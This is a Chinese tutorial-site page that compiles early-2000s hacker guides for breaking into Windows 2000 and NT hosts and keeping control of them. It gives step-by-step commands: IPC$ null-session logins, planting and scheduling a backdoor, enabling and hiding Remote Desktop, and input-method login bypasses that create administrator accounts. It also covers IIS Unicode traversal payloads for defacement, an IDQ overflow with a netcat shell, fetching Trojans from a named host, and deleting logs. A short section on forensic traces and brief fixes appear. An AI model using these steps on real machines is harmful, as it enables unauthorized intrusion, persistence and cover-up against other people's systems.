Windows XP Windows 7 Windows 2003 Windows Vista Windows教程綜合 Linux 系統教程
Windows 10 Windows 8 Windows 2008 Windows NT Windows Server 電腦軟件教程
 Windows教程網 >> Windows XP系統教程 >> xp常見問答解答 >> 怎樣從ipc$到開放3389到最後3389只為你服務

怎樣從ipc$到開放3389到最後3389只為你服務

日期:2017/1/25 11:30:57      編輯:xp常見問答解答

IPC掃描

獲得共享列表

g f e h I

獲得用戶列表

029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser

猜解成功用戶帳號 Administrator (Admin):(NULL)

隨便找了一台做實驗,先ipc$連上再說。
==========================================================================================
C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net use \\\\218.22.155.*\\ipc$ "" /user:administrator
----------------連接成功! 命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy wollf.exe \\\\218.22.155.*\\admin$
------------------------------拷貝wollf.exe到目標計算機的admin$目錄
已復制     1 個文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>copy hbulot.exe \\\\218.22.155.*\\admin$
-----------------------------拷貝hbulot.exe到目標計算機的admin$目錄
已復制     1 個文件。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>net time \\\\218.22.155.*
\\\\218.22.155.* 的當前時間是 2002/12/1 上午 06:37
命令成功完成。

C:\\Documents and Settings\\shanlu.XZGJDOMAIN>at \\\\218.22.155.* 06:39 wollf.exe
新加了一項作業,其作業 ID = 1--指定wollf.exe在06:39運行
------------------------------------------------------------------------------------------
說明:
wollf.exe是一個後門程序,很多高手都喜歡nc或者winshell,不過我對他情有獨鐘!在這裡我只介紹與本
文內容有關的命令參數,它的高級用法不做補充。
hbulot.exe是用於開啟3389服務,如果不是server及以上版本,就不要運行了。因為pro版不能安裝終端服務。
2分鐘後......

==========================================================================================
C:\\Documents and Settings\\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說明:
使用wollf連接時要注意wollf.exe要在當前目錄,它的連接命令格式:wollf -connect IP 7614
7614是wollf開放的端口。如果顯示如上,說明你已經連接成功,並具有管理員administrator權限。

==========================================================================================
[server@D:\\WINNT\\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說明:
輸入dos,你就會進入目標機的cmd下,這時同樣具有administrator權限。

==========================================================================================
D:\\WINNT\\system32>cd..
cd..

D:\\WINNT>dir h*.*
dir h*.*
驅動器 D 中的卷沒有標簽。
卷的序列號是 1CE5-2615

D:\\WINNT 的目錄

2002-11-27 03:07   

     Help
2002-09-10 12:16        10,752 hh.exe
2002-10-01 08:29        24,576 HBULOT.exe
        2 個文件     35,328 字節
        1 個目錄 9,049,604,096 可用字節

D:\\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說明:
因為我們把HBULOT.exe放到目標機的admin$下的,所以先找到它,以上是文件的存放位置。

==========================================================================================
D:\\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\\WINNT\\system32]#reboot

Command "REBOOT" succeed.

[server@D:\\WINNT\\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說明:
由dos退到wollf的連接模式下用exit命令,HBULOT.exe運行後需重新啟動方可生效,這裡wollf自帶的REBOOT命令,執行過在5秒後你就會失去連接。啟動完畢後檢查一下3389端口是否開放,方法很多,superscan3掃一下。這時候你就可以登陸了。如果沒有開放3389那就不是server及以上版本,就不要運行了。因為pro版不能安裝終端服務。到這裡,你已經擁有3389肉雞了!但是會不會被別的入侵者發現呢?下面所教的就是怎麼讓3389只為你服務!我們現在使用的3389登陸器有兩種版本,一種是2000/98,一種是XP。二者區別呢?前者使用的默認端口3389對目標,後者默認的也是3389端口,但是它還支持別的端口進行連接!所以呢......我們來修改3389的連接端口來躲過普通掃描器的掃描!修改方法如下:
修改服務器端的端口設置 ,注冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp] PortNumber值,默認是3389,修改成所希望的端口,比如1314
第二個地方: 
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]PortNumber值,默認是3389,修改成所希望的端口,比如1314 
現在這樣就可以了。重啟系統吧。 
注意:事實上,只修改第二處也是可以的。另外,第二處的標准聯結應該是 
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\ 
表示具體的某個RDP-TCP連結。
重啟過後,看看端口有沒有改。
小技巧:修改注冊表鍵值時,先選擇10進制,輸入你希望的端口數值,再選擇16進制,系統會自動轉換。

建立3389
建立批命令.包含以下信息
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
用IPC傳到對方機器後,net time得出對方時間然後at運行此批命令
五六分鐘以後對方機器重起可3389登陸
以此類推,可以在有IPC賬號情況下以批命令運行任何可運行的命令,如加賬號,開各種服務等!
3389肉雞深入討論 
序言
很多菜鳥擁有了第一台肉雞後,水平一日千裡,功夫飙升。所以有肉雞是菜鳥成為高手的 漫漫長路上的第一個目標。
本文將我個人的一些辦法(可能很土)與大家分享。
方法一)安裝服務
我知道很多人都有format 硬盤的壞習慣,我以前也有,現在徹底改邪歸正了。
如果找到一台有漏洞的機器(我這裡專指可以拿到權限的win2K機器),由於沒有開現成的端口,而輕易黑掉,是很可惜的。他沒有開,我們可以給他開嘛。

對於win2000,很多人進去都喜歡net start TermService,一般由於該服務被禁用,是開啟不成功的,那麼我們想一點別的辦法。:)

我們會用Windows 2000下的Resource Kits中的一個工具instsrv創建一個服務,instsrv的用法如下,當然,你也可以用其他的工具來實現(如srvinstw,GUI方式的)。
C:\>instsrv
Installs and removes system services from NT
INSTSRV ( | REMOVE)
[-a ] [-p ]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
大家現在明白了吧?
先instsrv TermService REMOVE
然後給他再裝上終端服務instsrv Winlogonservice c:\winnt\system32\termsrv.exe
嘿嘿,只要c:\winnt\system32\termsrv.exe存在,就可以給他裝上一個叫做Winlogonservice的服務,而且是自動啟動,哈哈~~
不妨在送個reboot.exe給他,然後用at \\xxx.xxx.xxx.xxx 23:30 reboot.exe
這樣他重啟過後我們就能連接他的3389了。:)

方法二)對於終端服務設置為已禁止的機器
使用win2000無人職守工具sysocmgr.exe:
echo [Components] > c:\bootlog.txt
echo TSEnabled = on >> c:\bootlog.txt
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q
sysocmgr的用法請自己到命令行下輸入 sysocmgr[回車] 看看幫助,寫得很清楚,上面的參數大致不變;如果你不想對方馬上重啟,輸入 /r 選項,擬制重啟(防止被發現):
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q /r

方法三)修改對方服務設置或者直接修改注冊表(成功率相對較低)
1、在regedit中菜單“注冊表”-》“連接網絡注冊表”
HKEY_LOCAL_MACHINE-》SYSTEM-》CurrentControlSet-》Services-》Termservice
將start鍵值修改為2-》退出regedit
想辦法讓對方機器重啟(reboot.exe很管用)
2、我的電腦-》管理-》服務-》Terminal Services-》屬性-》自動-》確定-》啟動Terminal Services(成功率不是很高)

進入肉雞後,請大家幫助升級,打補丁,堵漏洞(肉雞多半也是國內的嘛),然後她就會為你忠實服務了。
對於sa弱密碼進入系統的菜鳥,記得到 開始-》程序-》mssql server->enterprise management->。。。。-》security->logins裡面給自己加個帳戶(不要是DBO,會有麻煩),當然權限和sa相同,然後修改sa密碼(嘿嘿,獨占,這樣“她的眼裡只有你”)。
======== 續 =====
1)所謂“萬能3389攻擊”的具體攻擊辦法:

3389連接目標的時候,點擊服務器地址欄,點擊任務欄輸入法,選擇清華紫光(或者別的什麼鳥輸入法,只要能看幫助就行);
連接到3389服務器,如果對方剛好有這個輸入法,那麼就用輸入法漏洞利用方法一樣(差別是有的,關鍵在:找到什麼地方有“打開文件”或者“保存文件”對話框出現);

2)漏洞存在的原因及解決思路:

鑒於第三方輸入法都是系統及相關應用軟件(SQL server 、IIS、補丁等)裝好後才考慮的事情,這個幫助文件一般也不是放在%systemroot%\help下面,所以刪除這個目錄下面的win*是沒有用的,必須到安裝目錄去刪除.cnt或者*.hlp文件才行。
說得科學一點是這樣:第三方軟件設計缺陷導致系統出現漏洞;
說得玄乎一點就是系統打不打補丁都一樣能黑。
由於第三方軟件不在MS Service pack范圍內,當然與sp 無關。

聽著這兩種表示方式,大家覺得那樣比較好?
(我認為科學得態度是首要的,不要學李紅痔故弄玄虛,把握事情本質才是我們追求的)

3)體驗
這是輸入法漏洞利用的延伸,我曾經用清華紫光的這個幫助裡面的“添加打印機”(好像是)然後彈出的”保存文件“對話框內,找個可執行文件,右鍵點擊-》“建立快捷方式”-》快捷方式“屬性”=》net user ......-》確定-》右鍵點擊-》打開(也就是執行)
成功進入過一些機器。

4)題外話
另外,除非你運氣特別好,否則比較難遇到,因為服務器上裝東西的原則是:只要夠用就行。

5)最後給想做“超級黑客”的朋友的建議:多動腦和手;嘴巴吃飯喝酒比較累,一定要讓它多多休息。

3389入侵後實現上傳下載的簡單方法
 其實這是很簡單的:
首先你必須要有一個主頁空間,八要上傳的文件先上傳到主頁,然後打開終端,連接服務器,
跳至url中http://主頁/文件
如http://tnt168.51.net/sys.exe
然後會出現下載的頁面,保存或運行,
實現下載是這樣的:
現在浏覽器中//ip/scripts/cmd.exe?/c+copy+目標文件 c:\inetpub\wwwroot\目標文件.zip
然後就可以實現下載了,~o~
但下載後怎麼運行?很簡單,改變她的屬性:
察看--->文件夾選項--->察看--->將"隱藏已知的文件的擴展名"的勾去掉
再回到文件,將它重命名,改屬性為原來的屬性
如http://ip/cmd.zip(把cmd.exe改為了cmd.zip實現下載) 然後執行上面的步驟,改回cmd.exe就可以了!
這樣我們就能實現上傳下載了!我們把上載的文件改為一個不被病毒防火牆所查殺的木馬(推薦木馬信使tnt168.51.net/systtem.zip)
我們就能長期控制和知道她的密碼了
具體的方法相信大家都知道了,我不再羅嗦了
(cmd.exe請改名為其他以奪過檢查)
486 也跑 WIN2000 — WIN2000 輸入法漏洞應用實例
你是否也曾有一台牛 B 一時的 486 呢?如果它老人家還健在,那麼,別在多想,快快拍拍它身上的灰塵,讓我們一同享受 WIN2000 帶來的歡樂。

  最近有許多網友來信咨詢 WIN2000 上輸入法漏洞怎樣利用,有多大價值。的確,初看這個漏洞屬於本地漏洞,我們不可能為了用這個漏洞時跑到人家機房去試驗,那也是不現實的。但大家卻忽略了一個問題,就是 WIN2000 的遠程共享功能。有許多粗心的網絡管理員在安裝 WIN2000 時會不加選擇的安裝全部組件,這樣, WIN2000 的遠程共享功能就成為一個合法的天然超級木馬。

  具體怎樣用呢?聽我一一道來:

  我試驗的機器為 486 DX2/100 + 8M 內存+ 512M + WIN95 中文版+ MODEM (呵呵,艱苦樸素是中華民族的傳統美德)

1. 使用端口掃描工具。掃描一個網段內的 3389 端口。因為 WIN2000 的遠程共享功能就是通過這個端口實現的。建議使用小榕編寫的“流光 2001 ”+“ IP 限制破解補丁”,這樣你 就可以很容易迅速找到有遠程共享的 WIN2000 主機。如圖(一)

 


2. 使用“ WIN2000 終端”直接與目標 IP 進行連接。如圖(二)

 

 

3. 出現登入界面時,會要求你輸入密碼。不知道密碼不要緊,這時就可以應用 WIN2000 輸入法漏洞了!輸入 CTRL + SHIFT 切換當前輸入法到“智能 ABC ”,你可以通過“智能 ABC ”輸入法的狀態界面調出它的幫助系統。如圖(三)用 MOUSE 單擊幫助系統窗體左上角,在“ URL 轉至:”中輸入“ C :”回車。如圖(四)快看,右側的幫助正文窗體中列出了對方 C 盤的目錄。這時,你可以用 MOUSE 右擊對方 C 盤文件夾,進行打開文件夾或啟動資源管理器等操作,然後進入對方的 WINNT 主目錄中下載 SAM ,(經實驗某些版本 WIN2000 無法直接打開文件夾或啟動資源管理器,但你仍然可以改變 C 盤或文件夾屬性並設為共享。然後用 NET 命令下載對方的 SAM 密碼文件)。如圖(五)

 

 


4. 下面,你需要做的就是找一個破解 SAM 是軟件,對剛下載的 SAM 進行窮舉破解。

5. 一但密碼破解成功後,恭喜你,那台 WIN2000 就歸你用了!用“ WIN2000 終端”連入對方機器,你就可以盡情享受 WIN2000 的強大功能。在上面用流光跑跑 e - mail 密碼,如果你有 128k 帶寬的話,還可以看看 486 無力解碼的 RM 或 DVD 。“爽”就一個字,我只說一次!

  漏洞的初步補救方案:因為此漏洞在 WIN98 ~ WIN2000 + SP1 中各版本均存在,所以目前只有兩個辦法:

1. 不安裝 WIN2000 遠程共享功能

2. 刪除“智能 ABC ”“鄭碼”等輸入法,僅存英文和“微軟智能拼音”

          關於 WIN2000 遠程共享功能的擴展應用

  在譽兒本地的眾多網吧中,大多數組網采用 WIN98 對等網+ SYGATE 或 WINGATE 。

其成本大約是:     工作站:賽揚 533A + 15 寸彩顯+ 64M 內存+ 15G 硬盤+ TNT2 顯卡    

          3800 ~ 4000 元 / 台   ×   20 台   = 80000 元 (選其中一台作服務器)

  而使用 WIN2000 遠程共享功能組網

其成本大約是:   服務器一台:雙奔三- 800 、 512M 內存、 30G 硬盤、 WIN2000Server   15000 元

          工作站:奔騰- 75 + 512M 硬盤+ 17 寸彩顯(二手)+ WIN95 2000 元 / 台× 20 = 40000 元

          合計: 65000 元

  這樣你一下就省了近 20 %,偷著樂去吧!譽兒前些天就幫朋友作了一個這樣的網吧。而且還在 Server 上裝了個 NETSONIC 加速軟件,由於 20 台工作站緩存集中,所以速度成倍提高。

優缺點比較:   WIN98                       WIN2000

    不穩定 ,易死機,難維護   穩定,不死機,使用活動目錄技術,易維護,統一管理     網絡功能單一           網絡功能強大

由於使用 SYGATE 網關,       UDP 、 TCP 全部正常

OICQ 等軟件無法使用 TCP 協  

議進行連接,不能進行“二        

人世界”“文件傳輸”等        

  可以玩單機游戲           不能玩單機游戲

 

  總結:

    事物都有兩面性,上述例子就很明顯,關鍵還是如何正確利用技術。用的好可以省錢省心;用的不好,就只能作為黑客們的肉雞了。呵: p
WIN2000的輸入法入侵
這是一種入侵簡單,但造成用戶損失後果最嚴重的一種入侵方法,嚴禁入侵國內主機!請慎用之!!!

(使用系統:WIN98/ME/2000/NT)這個方法對簡體WIN2000有效。所以練習可以,但不要破壞。如果懂NET和IPC管道入侵的學者更容易學。

一 准備工具:WIN2000終端服務客戶端程序,SQLEXEC程序,SUPERSCAN掃描器。

二 我們先運行SUPERSCAN掃描器,掃描器設置如圖:

SUPERSCAN設置

注意:主要是改二個地方:一個IP地址,另一個端口改成3389.

三 我們掃出有3389端口打開的主機後,用SQLEXEC程序看看能不能創建新用戶。如果不能創建就放棄,(當然還有另一種方法,下面再說。)如果我們能用NET USER創建用戶,並把用戶加到ADMINISTRATORS組的話,那恭喜你。准備登陸。

四 我們打開WIN2000 客戶端程序。在最上面一項填入對方的IP。其他項不用改。按連接。過幾秒後客戶程序會打開一個窗口:


五 這個畫面相信你很熟悉了吧,在使用者名稱填入你剛才創建的用戶名,密碼欄填入你創建的密碼然後按確定。呵呵,等一會(具體時間要看網速)就登陸到對方機器的窗口了。如圖


登陸成功窗口

六 你可以看到對方主機的所有內容了,(怎麼感覺有點象冰河?呵,冰河也沒有這麼直觀呀)等於你強占了對方的機器,它的生殺大權就都在你手裡了。可別干壞事啊。呵呵。進去後記住要刪除入侵記錄。把c:winnt\system32\logfiles\*.* 文件刪除。別刪錯了呀。

上面的方法優點在於可以直接輸入用戶名和密碼就能登陸,缺點是要用SQLEXEC一個一個試。還有一種方法:此方法適合於熟練掌握NET命令的學員。

我們用SUPERSCAN先對一個網段進行掃描,掃描端口設為3389,運行客戶端連接管理器,將掃描到的任一地址加入到,設置好客戶端連接管理器,然後與服務器連結。幾秒鐘後,屏幕上顯示出WIN2000登錄界面(如果發現是英文或繁體中文版,放棄,另換一個地址),用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條(如果沒有出現,請耐心等待,因為對方的數據流傳輸還有一個過程)。用右鍵點擊狀態條上的微軟徽標,彈出“幫助”(如果發現“幫助”呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞),打開“幫助”一欄中“操作指南”,在最上面的任務欄點擊右鍵,會彈出一個菜單,打開“跳至URL”。此時將出現WIN2000的系統安裝路徑和要求我們填入的路徑的空白欄。比如,該系統安裝在C盤上,就在空白欄中填入“c:\winnt\system32”。然後按“確定”,於是我們就成功地繞過了身份驗證,進入了系統的SYSTEM32目錄。 現在我們要獲得一個賬號,成為系統的合法用戶。在該目錄下找到net.exe”,為net.exe”創建一個快捷方式,右鍵點擊該快捷方式,在“屬性”->“目標”->c:\winnt\system32\net.exe後面空一格,填入user 用戶名 密碼/add”,創建一個新賬號,運行該快捷方式,此時你不會看到運行狀態,但新用戶已被激活。然後又修改該快捷方式,填入localgroup administrators 新用戶 /add,將新用戶變成系統管理員。大家可以用SQL和IPC管道命令進入了。
對win2000的攻擊
對win2000的攻擊(新手不要錯過) 由於Win2000操作系統良好的網絡功能,因此在因特網中有部分網站服務器開始使用的Win2000作為主操作系 統的。但由於該操作系統是一個多用戶操作系統,黑客們為了在攻擊中隱藏自己,往往會選擇Win2000作為首先 攻擊的對象。攻擊win2000通常有余下比較簡單的方法: 圖形界面,遠程登陸3389端口的攻擊,下載superscan3.zip在地址:http://www.heibai.net/download/show.php?id=2 406在黑白上有。填上起始和停止的ip地址段,“所有端口從”3389到3389然後單擊開始掃描,把掃描到的活動主機復制到剪貼 版。然後下載X-Scan-v1.3.zip在地址: http://www.heibai.net/download/show.php?id=1 486也是黑白上的工具注意下載後要解壓縮。運行xscan_gui在基本設置裡填人剛才掃描的活動主機(粘貼剛才到剪貼版上即可)在掃描模塊裡選擇 sql-server弱口令和nt-server弱口令即可,等會我們要用到這,其他設置不變。當得到用戶名和密碼:202.120.5.2**的sql或win2000用戶名和密碼!哈哈現在好了,已經成功一大半了。 sql 密碼sa (null) 去http://hdsafe.com/down/soft.asp?id=19下載sql 遠程入侵工具sqlexec.exe 通過sql登陸到主機上,然後在主機上添加用戶。具體步驟如下: (一)輸入命令:net user heibao 1006 /add 回車添加一般用戶(二)輸入命令:net localgroup administrators heibao /add 回車將heibao添加到高級管理員組! 去hdsafe.com下載清風火舞win2000登陸器,填人ip地址:202.120.2.2** 連接,填上用戶名heibao和密碼1006即可進入系統。 掃描到win2000用戶名admini ,密碼:password 即可用清風火舞win2000登陸器直接進入即可哈哈,到現在我們有自己的肉雞了,在肉雞上我們可以干自己想干的事情,當然不能太過火了。注意: 1.如果本文提供的網址不能下載,則可用google.com搜索即可。 2.終端最大連接數問題的解決,telnet進去,然後輸入logoff 1 (1為id好號)

分析進入Win2000後留下的足跡
很多人對入侵Win2000系統很喜歡的吧,又有3389這樣的界面型遠程控制,還有這麼多漏洞可以利用,而且關於入侵Win2000的文章又到處都是,方便啊。 不過,你知道,你到底留下了哪些足跡在系統中麼?最近作了個入侵分析,發現了不少東西,當然,估計到入侵時間然後在查找文件就列出來了。我們在這裡不分析來自FTP、HTTP的日志記錄,因為這樣來的入侵行為分析和防范比較容易,而通過帳號密碼猜測進來的防范起來是比較麻煩的(安全配置相當OK的另說)。 1、系統的日志記錄。 好的管理員應該盡可能地記錄可以記錄的東西,在本地安全策略中,對審核策略進行足夠多的記錄,你能發現,如果把所有的審核都選定的話(只要你不嫌多),一個帳號進行的操作訪問的整個過程都能夠完整記錄下來了,一點不漏。 事件查看器裡記錄的內容是最多的了,從安全日志裡面可以查看所有審核的事件。 我們看看一個帳號的登錄/注銷事件的記錄: 會話從 winstation 中斷連接: 用戶名: guest 域: Refdom 登錄 ID: (0x0,0x28445D9) 會話名稱: Unknown 客戶端名: GUDULOVER 客戶端地址: 202.103.117.94 這是一個3389登錄的事件,系統記錄下了IP地址,機器名稱以及使用的用戶名。還是很齊全的吧。 這是一個詳細追蹤的記錄: 已經創建新的過程: 新的過程 ID: 4269918848 映象文件名: \WINNT\system32\CMD.EXE 創建者過程 ID: 2168673888 用戶名: Refdom$ 域: Refdom 登錄 ID: (0x0,0x3E7) 這是使用localsystem來運行了cmd.exe的記錄,呵呵,用本地系統帳號運行cmd.exe不是用net user還是什麼(當然還能做很多事情)。 小心自己的日志記錄太多,日志空間使用滿,這樣WIN就不再記錄新的事件了,請在日志屬性中選擇按需要改寫日志,這樣可以記錄新的事件,不過可能把需要分析的事件給改寫了。 可惜的是,這裡的記錄實在是太顯眼了,多半存活不了。 2、足夠多的痕跡留在“Documents and Settings”目錄裡面 這個目錄是所有帳號的足跡存放地,當然,從3389或者本機進入使用圖形界面就會留下帳號目錄來。我們來看看一個帳號的“Documents and Settings”目錄裡面有什麼東西吧,首先查看所有文件和文件夾,不要隱藏任何東西。 “「開始」菜單”:當然是存放帳號自己的“開始”中的東西,這個裡面的“啟動”是個比較好東西哦。 “Application Data”:一些應用程序留下的數據啊、備份啊什麼的東西,分析用處不怎麼大。 “Cookies”:如果入侵者通過3389進來,還去浏覽了網頁,那麼這裡就存放著足夠多的Cookie,讓你能夠知道他到底去了哪些地方。 “Local Settings”,這裡也是一些臨時數據的存放地,還有就是IE的脫機東東。說不定能發現很多好網站哦。 “Recent”:這個文件夾是隱藏的,不過裡面存放的東西實在太多了,帳號訪問的目錄、文件一個一個都記錄在案。使用了哪些東西,看了哪些文件,都能知道得清清楚楚。 “Templates”:存放臨時文件的地方。 3、從黑客工具看 被人入侵了,那他一定會想辦法獲得administrator權限,得到了這個權限他就能為所欲為了,按照各種介紹的入侵教材,當然是放置其他掃描器做肉雞、安裝後門、刪除日志……呵呵,這些掃描器都有足夠的日志可以提供分析,還能幫自己白白收集一些肉雞。而且從這些工具的日志(配置文件)裡面也可以看出入侵者的意圖以及水平等等。 也好,那流光來說吧,每次掃描的結果都寫下來了,大家都可以看,不看白不看。 被安裝後門、代理跳板(不是多級)是最好的了,誰能遠程控制你做什麼呢?我們當然可以從後門程序抓住入侵者的來歷,從哪裡傳過來的連接,用嗅歎器就是了,當然,你甚至可以用一個非常有意思的文件名來偽裝自己的木馬,讓他當回去使用,想玩大家一起玩啊。當然,從另外的3389肉雞這樣的控制來的入侵者還是只找到的他的肉雞而已。(冒險,把他的肉雞也搞定吧)

由於網上很多朋友問我怎麼入侵別人的機器,所以整理了一些我認為容易學的漏洞入侵方法,希望能給初學者一些幫助,下面講的內容很簡單,高手就不用浪費時間看了,:)

(1) UNICODE漏洞入侵
“Uicode漏洞”是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步,運行RANGSCAN掃描器,會出現掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框裡填入啟始域(打個比方,比如你要掃192.168.0.1至192.168.0.255)那麼你在第一個框裡就填入192.168.0.1,在to 後面的框裡填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍裡有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框裡,再按一下添加。再按“掃描”。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結果框裡就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞,
目標有了,我們馬上打開浏覽器。在網址欄裡輸入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器裡C盤的根目錄。一般情況下,我們都可以在浏覽器裡看到類似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p
Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a
Inetpub
2002-01-19 10:37p
MSSQL7
2002-03-09 04:22p
Program Files
2002-01-23 06:21p
WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好,我們成功看到了機器裡的C盤了。
我們在浏覽器裡輸入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我們看到了機器設置內容了,我們找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄裡,知道就好辦了。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄裡的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄裡有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設置只讀。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功,只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已經改了他的網頁了,呵呵,你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000輸入法漏洞
先用端口掃描器掃描開放3389的機器,然後用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條,在輸入法狀態條上按鼠標右鍵。選擇“幫助” —— “輸入法指南” —— “選項”。(如果發現“幫助”呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞。)按右鍵,選擇“跳轉到URL”,輸入:c:\winnt\system32在該目錄下找到“net.exe”,為“net.exe”創建一個快捷方式,右鍵點擊該快捷方式,在“屬性” —“目標”—c:\winnt\system32\net.exe 後面空一格,填入“user guest /active :yes”。 點擊“確定”(目的是,利用“net.exe”激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態,但guest用戶已被激活。)然後重復操作上面的,在 “屬性” —— “目標”—— c:\winnt\system32\net.exe 後面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用“net.exe”將guest變成系統管理員。)再次登錄終端服務器,以“guest”身份進入,此時guest已是系統管理員,已具備一切可執行權及一切操作權限。現在,我們可以像操作本地主機一樣,控制對方系統。
(3) idq溢出漏洞
要用到3個程序,一個Snake IIS IDQ 溢出程序GUI版本,一個掃描器,還有NC。
首先掃描一台有IDQ漏洞的機器,然後設置Snake IIS IDQ 溢出程序,在被攻擊IP地址後面寫上對方的IP.端口號一般不需要改動,軟件的默認綁定CMD.EXE的端口是813.不改了.用默認的,左面選擇操作系統類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了,然後我們用NC來連接。
進入MS-DOS。進入“nc”的目錄。然後:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
